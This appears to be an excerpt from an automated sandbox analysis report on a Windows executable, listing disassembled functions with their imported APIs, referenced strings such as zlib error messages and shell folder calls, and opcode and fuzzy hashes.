Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown compression method$unknown header flags set
API String ID: 0-4074041902
Opcode ID: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
Instruction ID: 440100e0ad3e42c115cce95f3fb78f0a990aae4413b5501bd8dd5ba0711be261
Opcode Fuzzy Hash: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
Instruction Fuzzy Hash: 7A02B1726007949BEBA78F16C488BAE3BE9FB4CB94F164518EF894B7A0D775C940C740

Function 0000000140016210 Relevance: 4.1, Strings: 3, Instructions: 372COMMON

Download Yara Rule

Strings

invalid distance too far back, xrefs: 0000000140016697
invalid literal/length code, xrefs: 0000000140016663
invalid distance code, xrefs: 0000000140016679

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID:
String ID: invalid distance code$invalid distance too far back$invalid literal/length code
API String ID: 0-3255898291
Opcode ID: e9ea9672f90cea75fd930f9b725da38f325f2299c3bc13611abce9c87a4e8c41
Instruction ID: 3f1348f65b8f8bda14ba5cdfa7bf6f02fc8c4dbb68883e69d1ec2b1899c7470d
Opcode Fuzzy Hash: e9ea9672f90cea75fd930f9b725da38f325f2299c3bc13611abce9c87a4e8c41
Instruction Fuzzy Hash: C5D138326186D08BD71A8F3AD8447BD7FA1F3993C4F54811AEB968B791D63DCA4AC700

Function 0000000140012FDD Relevance: 4.0, Strings: 3, Instructions: 217COMMON

Download Yara Rule

Strings

invalid window size, xrefs: 0000000140013145
incorrect header check, xrefs: 000000014001315D
unknown compression method, xrefs: 00000001400130C8

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size$unknown compression method
API String ID: 0-1186847913
Opcode ID: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
Instruction ID: c7f0437dc46e56fef3014f932af091831cb3ca76e565b5a088b3fef6b265a946
Opcode Fuzzy Hash: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
Instruction Fuzzy Hash: 9391A2726106949BFBA6CF26C584B9E3BA9F70C794F114229EB464BBE1C736D950CB00

Function 000000014001366E Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

, xrefs: 000000014001368E
invalid block type, xrefs: 000000014001377B
, xrefs: 000000014001366E

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID:
String ID: $ $invalid block type
API String ID: 0-2056396358
Opcode ID: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
Instruction ID: 6826abb0ae9e935998ffe99ae2e08a78a36fe9b187ecd4f73c4f7ab9da41e151
Opcode Fuzzy Hash: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
Instruction Fuzzy Hash: 7161E3B3510B949BE766CF26C8887AD3BE8F708394F554229EB558B7E0D73AC490CB40

Function 000000014000EA48 Relevance: 2.8, APIs: 1, Instructions: 1540COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 000000014000EA7A

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
Instruction ID: c8f745e53e58f4d3ff63e30af0f782c513ee99f48fb140b821e661274e727f8d
Opcode Fuzzy Hash: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
Instruction Fuzzy Hash: 1DC291B3A282408BD368CF69E85665BB7A1F7D8748F45A029FB87D3B44D63CD9018F44

Function 0000000140010210 Relevance: .7, Instructions: 676COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28a696735792be4af076da833e5dcb064fa3499b6e6f110371e014232abd0523
Instruction ID: 022ba38ea2fc746ee1b0595bfd7f682d53a7df84c20089d95d53e5e85305b389
Opcode Fuzzy Hash: 28a696735792be4af076da833e5dcb064fa3499b6e6f110371e014232abd0523
Instruction Fuzzy Hash: E32283B7F744204BD71DCB69EC52FE836A2B75434C709A02CAA17D3F44EA3DEA158A44

Function 0000000140015170 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
Instruction ID: f294bca1e54ba5f97cd1887ffa6c8c7d976b4678fb34f7ffe8470b0002a4fcc7
Opcode Fuzzy Hash: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
Instruction Fuzzy Hash: 7B8150733301749BE7668A2EA514BE93290F3693CEFC56115FB8487B45CA3EB921CB50

Function 0000000140015160 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
Instruction ID: e67d2bfc1a2697f1f60af7736c02a9787f64ff3490f4c327f028a03746ec3e44
Opcode Fuzzy Hash: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
Instruction Fuzzy Hash: FE715CB23301749BEB658B2E9514BE93390F36A349FC56105EB855BB81CE3EB921CF50

Function 00000001400154F0 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
Instruction ID: b94fce4af05d2a3b47cf10f4c42de706c870d6d3f1c440dba90fb4ad6b70bb1c
Opcode Fuzzy Hash: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
Instruction Fuzzy Hash: 3941BB32310640CAFBAA9B1AE020BEE3691E7997C5FD49115DB819FAF0D63BD4058B40

Function 000000014000BC94 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 115libraryloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 000000014000BCDB
memset.MSVCRT ref: 000000014000BCEC
LoadLibraryW.KERNEL32 ref: 000000014000BCFB
GetProcAddress.KERNEL32 ref: 000000014000BD1C
GetProcAddress.KERNEL32 ref: 000000014000BD2F
wcsncpy.MSVCRT ref: 000000014000BD53
wcslen.MSVCRT ref: 000000014000BD66
CoTaskMemFree.OLE32 ref: 000000014000BDF2
wcslen.MSVCRT ref: 000000014000BDFB
FreeLibrary.KERNEL32 ref: 000000014000BE18

Strings

SHELL32.DLL, xrefs: 000000014000BCF1
SHGetPathFromIDListW, xrefs: 000000014000BD22
SHBrowseForFolderW, xrefs: 000000014000BD12
P, xrefs: 000000014000BD9C

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
API String ID: 217932011-4219398408
Opcode ID: c6f64f31bbdd53e5c9615b97b996e53b9347b52efb9bfdd58b217e32d9a890a1
Instruction ID: f53257261a77fa7679be829afa5858120bcd1a05ac071047bacb850080d37645
Opcode Fuzzy Hash: c6f64f31bbdd53e5c9615b97b996e53b9347b52efb9bfdd58b217e32d9a890a1
Instruction Fuzzy Hash: F7418D72211B8082EB16EF12E8443EA73A4F78CBC8F544125EB4A477A5EF39C95AC700

Function 000000014000DB18 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 107libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400126D0: TlsGetValue.KERNEL32 ref: 00000001400126E2
Part of subcall function 00000001400126D0: HeapReAlloc.KERNEL32 ref: 0000000140012762

LoadLibraryW.KERNEL32 ref: 000000014000DB51
GetProcAddress.KERNEL32 ref: 000000014000DB69
wcscpy.MSVCRT ref: 000000014000DB9A
wcscat.MSVCRT ref: 000000014000DBA9
wcslen.MSVCRT ref: 000000014000DBB1
CoTaskMemFree.OLE32 ref: 000000014000DBBE
FreeLibrary.KERNEL32 ref: 000000014000DBC7
wcscat.MSVCRT ref: 000000014000DBEC
wcslen.MSVCRT ref: 000000014000DBF4

Strings

SHGetKnownFolderPath, xrefs: 000000014000DB5F
Downloads\, xrefs: 000000014000DBE2
Shell32.DLL, xrefs: 000000014000DB4A

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
API String ID: 1740785346-287042676
Opcode ID: e5bab1e40f8d65dd4e7d5d62996c70c4389265927e72bd1646414111646def34
Instruction ID: ffb59ae5301eeda9161766390bd85b6f914ac2b2dd013f36d3426db2d5643a12
Opcode Fuzzy Hash: e5bab1e40f8d65dd4e7d5d62996c70c4389265927e72bd1646414111646def34
Instruction Fuzzy Hash: A64186B1214A46C2FA27EB57B4947F97291AB8C7D0F540127BB0A0B7F5DEB9C841C611

Function 0000000140016FB4 Relevance: 19.6, APIs: 13, Instructions: 81memoryregistrythreadCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0000000140016FE2
InitializeCriticalSection.KERNEL32 ref: 0000000140016FF1
TlsGetValue.KERNEL32 ref: 0000000140017007
HeapAlloc.KERNEL32 ref: 0000000140017027
EnterCriticalSection.KERNEL32 ref: 000000014001703C
LeaveCriticalSection.KERNEL32 ref: 000000014001705F
GetCurrentProcess.KERNEL32 ref: 0000000140017065
GetCurrentThread.KERNEL32 ref: 000000014001706E
GetCurrentProcess.KERNEL32 ref: 0000000140017077
DuplicateHandle.KERNEL32 ref: 000000014001709C
RegisterWaitForSingleObject.KERNEL32 ref: 00000001400170C1
TlsSetValue.KERNEL32 ref: 00000001400170D0
HeapAlloc.KERNEL32 ref: 00000001400170E3

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
String ID:
API String ID: 298514914-0
Opcode ID: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
Instruction ID: 0ebcb89b5f496a055c7edd3f2936d7e00332f328880e18a7a0f049a68aa3c175
Opcode Fuzzy Hash: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
Instruction Fuzzy Hash: 0641E172201B409AEB129F62E8447A977A0F78CBD5F484129EB4D0B774DF39C999D740

Function 0000000140008260 Relevance: 13.7, APIs: 9, Instructions: 249COMMON

Download Yara Rule

APIs

wcsncpy.MSVCRT ref: 0000000140008373

Part of subcall function 0000000140012630: TlsGetValue.KERNEL32 ref: 000000014001263F

_wcsdup.MSVCRT ref: 00000001400083AD
_wcsdup.MSVCRT ref: 00000001400083D0
_wcsdup.MSVCRT ref: 00000001400083EE
wcsncpy.MSVCRT ref: 00000001400084F6
free.MSVCRT ref: 0000000140008570
free.MSVCRT ref: 0000000140008582
free.MSVCRT ref: 0000000140008596
wcsncpy.MSVCRT ref: 00000001400085CE

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: _wcsdupfreewcsncpy$Value
String ID:
API String ID: 1554701960-0
Opcode ID: 39699e6607edbd281478320c41bc5aaf7562ab5abe15b46f77e1710a2ecc13f5
Instruction ID: da1d114085ca4aa9233c1495fb0579f216bdf29e57c82a9bb0fca7f891cc91e6
Opcode Fuzzy Hash: 39699e6607edbd281478320c41bc5aaf7562ab5abe15b46f77e1710a2ecc13f5
Instruction Fuzzy Hash: AE91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701

Function 000000014000B64C Relevance: 12.1, APIs: 8, Instructions: 56COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 000000014000B674
EnableWindow.USER32 ref: 000000014000B6F6
DestroyWindow.USER32 ref: 000000014000B706
UnregisterClassW.USER32 ref: 000000014000B71C

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: Window$ClassDestroyEnableProcUnregister
String ID:
API String ID: 1570244450-0
Opcode ID: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
Instruction ID: a4636e2d5cbf899b35d7322a6c98c02ffc5b8df7e19630505cb7187d8542c3a3
Opcode Fuzzy Hash: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
Instruction Fuzzy Hash: 4A210BB4204A5182FB56DB27F8483B923A1E78CBC1F549026FB4A4B7B5DF3DC8859700

Function 000000014000BEA0 Relevance: 12.0, APIs: 8, Instructions: 44threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32 ref: 000000014000BEAF
GetCurrentThreadId.KERNEL32 ref: 000000014000BEB7
IsWindowVisible.USER32 ref: 000000014000BEC4

Part of subcall function 0000000140011CB0: HeapAlloc.KERNEL32 ref: 0000000140011CC8

GetCurrentThreadId.KERNEL32 ref: 000000014000BEE6
GetWindowLongPtrW.USER32 ref: 000000014000BEFC
GetForegroundWindow.USER32 ref: 000000014000BF0A
IsWindowEnabled.USER32 ref: 000000014000BF18
EnableWindow.USER32 ref: 000000014000BF2B

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
String ID:
API String ID: 3383493704-0
Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301

Function 0000000140011AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0000000140011AD9
GetProcAddress.KERNEL32 ref: 0000000140011AF5
FreeLibrary.KERNEL32 ref: 0000000140011B1A
Sleep.KERNEL32 ref: 0000000140011B3A

Strings

InitOnceExecuteOnce, xrefs: 0000000140011AEB
Kernel32.dll, xrefs: 0000000140011ACD

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: Library$AddressFreeLoadProcSleep
String ID: InitOnceExecuteOnce$Kernel32.dll
API String ID: 938261879-1339284965
Opcode ID: 72da134d983737982ac4ef6395f0fd6253c9f3b81f1b0775f7966da8eab3fff3
Instruction ID: b5645326e5d4f07ede329690aacabb45cf3e43243987f71da7b0cd1098b1f21b
Opcode Fuzzy Hash: 72da134d983737982ac4ef6395f0fd6253c9f3b81f1b0775f7966da8eab3fff3
Instruction Fuzzy Hash: B4118F3120874585EB5ADF57A8843E973A0EB8CBD0F488029AB0A0B666EF3AC595C740

Function 000000014000BF44 Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 000000014000BF61
GetCurrentThreadId.KERNEL32 ref: 000000014000BF7A
SetWindowPos.USER32 ref: 000000014000BFAB
GetCurrentThreadId.KERNEL32 ref: 000000014000BFCA
EnableWindow.USER32 ref: 000000014000BFE4
SetWindowPos.USER32 ref: 000000014000C010

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: Window$CurrentThread$EnableEnumWindows
String ID:
API String ID: 2527101397-0
Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00

Function 00000001400110DC Relevance: 9.1, APIs: 6, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0000000140011112
HeapAlloc.KERNEL32 ref: 000000014001112D
TlsSetValue.KERNEL32 ref: 000000014001113C
TlsGetValue.KERNEL32 ref: 000000014001115F
HeapReAlloc.KERNEL32 ref: 000000014001117B
TlsSetValue.KERNEL32 ref: 000000014001118D

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: AllocValue$Heap
String ID:
API String ID: 2472784365-0
Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740

Function 0000000140007284 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00000001400072B3
EnterCriticalSection.KERNEL32 ref: 00000001400072CC
WaitForSingleObject.KERNEL32 ref: 00000001400072E4
CloseHandle.KERNEL32 ref: 00000001400072F1
LeaveCriticalSection.KERNEL32 ref: 0000000140007344

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
String ID:
API String ID: 458812214-0
Opcode ID: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
Instruction ID: 37a7c27cb33ea643b241ae4d06e82751f63dd7a6f22fff0809f2f79c8fcd043f
Opcode Fuzzy Hash: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
Instruction Fuzzy Hash: 5E21FD76204B0081EB06DB12E8943E973A4FB8CBC4F988126EB8D477B9DF39C906C300

Function 0000000140011968 Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140011985
LeaveCriticalSection.KERNEL32 ref: 00000001400119F4

Part of subcall function 0000000140011968: HeapFree.KERNEL32 ref: 00000001400119E7

DeleteCriticalSection.KERNEL32 ref: 0000000140011A0B
HeapFree.KERNEL32 ref: 0000000140011A1D

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
